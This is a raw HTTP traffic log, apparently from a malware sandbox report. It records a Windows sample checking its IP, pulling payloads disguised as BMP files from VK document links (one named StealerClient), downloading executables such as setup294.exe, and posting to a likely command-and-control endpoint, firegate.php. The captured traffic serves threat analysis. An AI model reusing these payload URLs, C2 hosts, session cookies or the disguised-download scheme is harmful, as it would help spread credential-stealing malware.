Network Analysis

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Fri, 14 Jul 2023 08:11:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wKKVYZx2TGqEC7Fn7TWa5IEg5N9sUMr130I8r4SmocDHdMTvjVrg%2FAXyFT9d1goHyPuk%2FyNvnPJX0bYaoJ6e%2BPLZb1dbNkeyjg3fMrQJqgPEsxEGbM6nDMnG%2B6Axxw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7e684b43fe918d0a-KIX

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: kittenx Date: Fri, 14 Jul 2023 08:11:21 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 237735 Connection: keep-alive X-Powered-By: KPHP/7.4.114160 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixlang=17; expires=Wed, 17 Jul 2024 00:44:48 GMT; path=/; domain=.vk.com Set-Cookie: remixstlid=9066133395953590218_iBUpEZPvzcziNcPLhiQ194ZBBamru96btylUr9KI09g; expires=Sat, 13 Jul 2024 08:11:21 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixlgck=11b4103eb2bc68a0f8; expires=Wed, 10 Jul 2024 00:34:15 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstid=222751413_M0pASLftZFUZ1nHUxr83cDEo2tnEg83mPWJeUPif2FX; expires=Tue, 16 Jul 2024 09:21:43 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /setup294.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: camoverde.pw Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 14 Jul 2023 08:11:25 GMT Content-Type: application/x-msdos-program Content-Length: 1870308 Connection: keep-alive Last-Modified: Fri, 14 Jul 2023 07:40:21 GMT ETag: "1c89e4-6006d8f9b0340" Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=52cRFgvHGckHqx4I%2B0%2FlsaTPoBdnQqU6Ci6rJpUny4cEozG3QFaYehQQgaHDIYhVix4JtDsyjBsYXUyh%2Fsp9AJID%2FoygQPFKtDhh16ihj16aeTAnv8tQ82gJi7ugI8o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7e684b789c638351-KIX alt-svc: h3=":443"; ma=86400

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#stats HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9066133395953590218_iBUpEZPvzcziNcPLhiQ194ZBBamru96btylUr9KI09g; remixlgck=11b4103eb2bc68a0f8; remixstid=222751413_M0pASLftZFUZ1nHUxr83cDEo2tnEg83mPWJeUPif2FX

HTTP/1.1 200 OK Server: kittenx Date: Fri, 14 Jul 2023 08:11:28 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 237751 Connection: keep-alive X-Powered-By: KPHP/7.4.114160 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc808950829_664207170?hash=kMt7FUJyRMXd3utd25izhIrZbfZfaKJzCnFJqUmY3Sw&dl=uZ3GDnIBuaFj1FCG7xA3gziJZ6Zba8NMATPW6Lqrzb0&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9066133395953590218_iBUpEZPvzcziNcPLhiQ194ZBBamru96btylUr9KI09g; remixlgck=11b4103eb2bc68a0f8; remixstid=222751413_M0pASLftZFUZ1nHUxr83cDEo2tnEg83mPWJeUPif2FX

HTTP/1.1 302 Found Server: kittenx Date: Fri, 14 Jul 2023 08:11:28 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114160 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-22.userapi.com/c237331/u808950829/docs/d28/ae3bfa00ff0c/PMmp.bmp?extra=J2TWIaPG8nt7VFEEdsoRjaML2uGBOoaWesHpn7S_rEt-8bLY3h8kXOzdKGgyiYkFZ7JQENAekGCG-l1lSB3HmNet-idXGM_O0g3h0VW1MYvH5OuvyNOkFVJKbZ4kwaqz6Fe9_skefq-ZiIhePg X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c237331/u808950829/docs/d28/ae3bfa00ff0c/PMmp.bmp?extra=J2TWIaPG8nt7VFEEdsoRjaML2uGBOoaWesHpn7S_rEt-8bLY3h8kXOzdKGgyiYkFZ7JQENAekGCG-l1lSB3HmNet-idXGM_O0g3h0VW1MYvH5OuvyNOkFVJKbZ4kwaqz6Fe9_skefq-ZiIhePg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-22.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 14 Jul 2023 08:11:29 GMT Content-Type: image/x-ms-bmp Content-Length: 6771716 Connection: keep-alive Last-Modified: Thu, 13 Jul 2023 11:19:05 GMT ETag: "64afdda9-675404" Expires: Sun, 13 Aug 2023 08:11:29 GMT Cache-Control: max-age=2592000 X-Frontend: front6-22 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#test HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9066133395953590218_iBUpEZPvzcziNcPLhiQ194ZBBamru96btylUr9KI09g; remixlgck=11b4103eb2bc68a0f8; remixstid=222751413_M0pASLftZFUZ1nHUxr83cDEo2tnEg83mPWJeUPif2FX; remixir=1

HTTP/1.1 200 OK Server: kittenx Date: Fri, 14 Jul 2023 08:11:32 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 237750 Connection: keep-alive X-Powered-By: KPHP/7.4.114160 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc808950829_663788437?hash=2eEvnU5tvv0tTTXDhEX8q9Boubn9undHCOt73KTUqzD&dl=EJ05zUitXuxdQoIcYUJ5Zj5KPM6Kzzrdpz0VhUeNkOo&api=1&no_preview=1#WW1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9066133395953590218_iBUpEZPvzcziNcPLhiQ194ZBBamru96btylUr9KI09g; remixlgck=11b4103eb2bc68a0f8; remixstid=222751413_M0pASLftZFUZ1nHUxr83cDEo2tnEg83mPWJeUPif2FX

HTTP/1.1 200 OK Server: kittenx Date: Fri, 14 Jul 2023 08:11:34 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 237678 Connection: keep-alive X-Powered-By: KPHP/7.4.114160 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc808950829_663974118?hash=dOMWUsvinJ2cpviUzz7vnxpsK8egTpcGetxzR7zZrlH&dl=jOHjRjzy9zAt3pzHP5nbHskFZI2CUKmKC4cOjJyWMzc&api=1&no_preview=1#5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9066133395953590218_iBUpEZPvzcziNcPLhiQ194ZBBamru96btylUr9KI09g; remixlgck=11b4103eb2bc68a0f8; remixstid=222751413_M0pASLftZFUZ1nHUxr83cDEo2tnEg83mPWJeUPif2FX

HTTP/1.1 302 Found Server: kittenx Date: Fri, 14 Jul 2023 08:11:35 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114160 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c240331/u808950829/docs/d25/b34ec3f5108d/5.bmp?extra=lFuRArKUHaROGi5k6FRvAaY3SvE8fmJ3SopiS96x7YJ6ZQ2Wy0azMyoNTaksC1wWJzsMi2bYWTlngyI951fFVKRMueQKDUHhUQZqsO0U-TbobXmLzjcX84L_-YfHFSphcnp155z-sEpMc5huqA X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c240331/u808950829/docs/d25/b34ec3f5108d/5.bmp?extra=lFuRArKUHaROGi5k6FRvAaY3SvE8fmJ3SopiS96x7YJ6ZQ2Wy0azMyoNTaksC1wWJzsMi2bYWTlngyI951fFVKRMueQKDUHhUQZqsO0U-TbobXmLzjcX84L_-YfHFSphcnp155z-sEpMc5huqA HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 14 Jul 2023 08:11:36 GMT Content-Type: image/x-ms-bmp Content-Length: 727652 Connection: keep-alive Last-Modified: Sat, 08 Jul 2023 07:43:08 GMT ETag: "64a9138c-b1a64" Expires: Sun, 13 Aug 2023 08:11:36 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /doc808950829_663933421?hash=ioG5QB3qvIws86ott1cKJe6Pb7yplHVFXBwsSvr5HZs&dl=mmMqy1dNgzrQdMHtVCaer8XyZ5fyDV65DqKrscCiZKT&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9066133395953590218_iBUpEZPvzcziNcPLhiQ194ZBBamru96btylUr9KI09g; remixlgck=11b4103eb2bc68a0f8; remixstid=222751413_M0pASLftZFUZ1nHUxr83cDEo2tnEg83mPWJeUPif2FX

HTTP/1.1 302 Found Server: kittenx Date: Fri, 14 Jul 2023 08:11:36 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114160 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-21.userapi.com/c235131/u808950829/docs/d53/3d058453faef/31bhpef20u5o7.bmp?extra=Sk2iuVbY1H06rVGdYq-mFzpkK_0K54Gg304PtafLqXDLbIVHsUda81wvOQqwPGl5F5ajfnCZvZEvpAw4lsO9Lafy7X84d3kyUdFOsITm9TUbfSVrOYpinKz5ihN_utW0swYRZB_Q_Osd8rEOmg X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c235131/u808950829/docs/d53/3d058453faef/31bhpef20u5o7.bmp?extra=Sk2iuVbY1H06rVGdYq-mFzpkK_0K54Gg304PtafLqXDLbIVHsUda81wvOQqwPGl5F5ajfnCZvZEvpAw4lsO9Lafy7X84d3kyUdFOsITm9TUbfSVrOYpinKz5ihN_utW0swYRZB_Q_Osd8rEOmg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-21.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 14 Jul 2023 08:11:37 GMT Content-Type: image/x-ms-bmp Content-Length: 692324 Connection: keep-alive Last-Modified: Fri, 07 Jul 2023 09:57:35 GMT ETag: "64a7e18f-a9064" Expires: Sun, 13 Aug 2023 08:11:37 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /doc808950829_664243581?hash=WrzMcu5sQcHQStZvqHgs8NvpTBzI6rH0dAPO5bEZbSw&dl=Ceos7VtAG6OZQeZpZU7obenLsizYQEUV1F7MXPI7iZX&api=1&no_preview=1#rise_test HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9066133395953590218_iBUpEZPvzcziNcPLhiQ194ZBBamru96btylUr9KI09g; remixlgck=11b4103eb2bc68a0f8; remixstid=222751413_M0pASLftZFUZ1nHUxr83cDEo2tnEg83mPWJeUPif2FX; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Fri, 14 Jul 2023 08:11:39 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114160 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://psv4.userapi.com/c909328/u808950829/docs/d27/600eab1b51d3/StealerClient.bmp?extra=xlq-trvJdrtcA1tFaPPMJmS1s2mGKoF5FnF9zt8L_nNVY0MZAD6oDkSrnYia0AJFI5xLlH6KjSP8etm9qtPQpQSD2cdNxi_KwzjuOBY4NiOfYSeioqmtzlRNFcoJz9lre6BVANxgbE_CAop5aA X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909328/u808950829/docs/d27/600eab1b51d3/StealerClient.bmp?extra=xlq-trvJdrtcA1tFaPPMJmS1s2mGKoF5FnF9zt8L_nNVY0MZAD6oDkSrnYia0AJFI5xLlH6KjSP8etm9qtPQpQSD2cdNxi_KwzjuOBY4NiOfYSeioqmtzlRNFcoJz9lre6BVANxgbE_CAop5aA HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: psv4.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 14 Jul 2023 08:11:40 GMT Content-Type: image/x-ms-bmp Content-Length: 1036804 Connection: keep-alive Last-Modified: Fri, 14 Jul 2023 07:48:03 GMT ETag: "64b0fdb3-fd204" Accept-Ranges: bytes Expires: Fri, 21 Jul 2023 08:11:40 GMT Cache-Control: max-age=604800 X-Frontend: front632904 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Methods: GET, HEAD, OPTIONS Access-Control-Allow-Origin: * Strict-Transport-Security: max-age=15768000 Accept-Ranges: bytes

GET /demo/home.php?s=175.208.134.152 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Fri, 14 Jul 2023 08:12:21 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive X-IPLB-Request-ID: 8D655603:59A0_93878F2E:0050_64B10364_1C68B77F:2467B X-IPLB-Instance: 30783 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cLIsjBpo9pw3vMLRtYcg8ZsxMpr7xFdh5Jity1Qd2%2FpzFJjcuKS9Q9Bg90jF9e4lfZ1ainvFkEjz2%2BfDdGsIcSlWG6CnkLn3mYFEX7Z6SKyvZiKEcTOrF2aC6g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7e684cd55fa61a14-KIX alt-svc: h3=":443"; ma=86400

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Fri, 14 Jul 2023 08:12:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Cache-control: max-age=28800 X-IPLB-Request-ID: AC46E918:3296_93878F2E:0050_64B0DB7D_1C6BA4CE:2467C X-IPLB-Instance: 30783 CF-Cache-Status: HIT Age: 10215 Last-Modified: Fri, 14 Jul 2023 05:22:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7HTUfJ%2BO1Cl6in9EI9O%2B3KESMVjfIcRUkob2cHXZyTGWuHSO4JjQSxXgxVje%2FtvFCsuRzjoZk8%2BX5x%2FuhFH3LApGckCaEq8Sn5fZ8GsrNFmKqhL1MMP9l9H0bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7e684cd6ae8f8d10-KIX alt-svc: h3=":443"; ma=86400

POST /v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self HTTP/1.1 Connection: Keep-Alive Referer: https://db-ip.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 0 Host: api.db-ip.com

HTTP/1.1 200 OK Date: Fri, 14 Jul 2023 08:12:21 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Origin: http*://*db-ip.com Cache-control: max-age=180 X-IPLB-Request-ID: 8D655645:D2D2_93878F2E:0050_64B10365_1C68B78D:2467B X-IPLB-Instance: 30783 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ndMq6veaMr7itparHv9XvXlx23iyGAEQ7sDN1MYC4eLp%2FTrDp8yuLIdOkUuG%2B%2BQQJvkqhPll%2B20y8amBFnO1DnDIcOii01mRUz7by4n1zs%2FNUWVFUZ7C03H2c5E5e0k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7e684cd939c919c9-KIX alt-svc: h3=":443"; ma=86400

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 85.208.136.10

HTTP/1.1 200 OK Date: Fri, 14 Jul 2023 08:11:16 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 85.208.136.10

HTTP/1.1 200 OK Date: Fri, 14 Jul 2023 08:11:17 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 85.208.136.10

HTTP/1.1 200 OK Date: Fri, 14 Jul 2023 08:11:23 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 3736 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /info/photo540.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 77.91.124.40 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Content-Length: 1624576 Content-Type: application/octet-stream Last-Modified: Fri, 14 Jul 2023 16:11:05 GMT Accept-Ranges: bytes ETag: "92edb5ca6db6d91:0" Server: Microsoft-IIS/10.0 Date: Fri, 14 Jul 2023 16:11:22 GMT

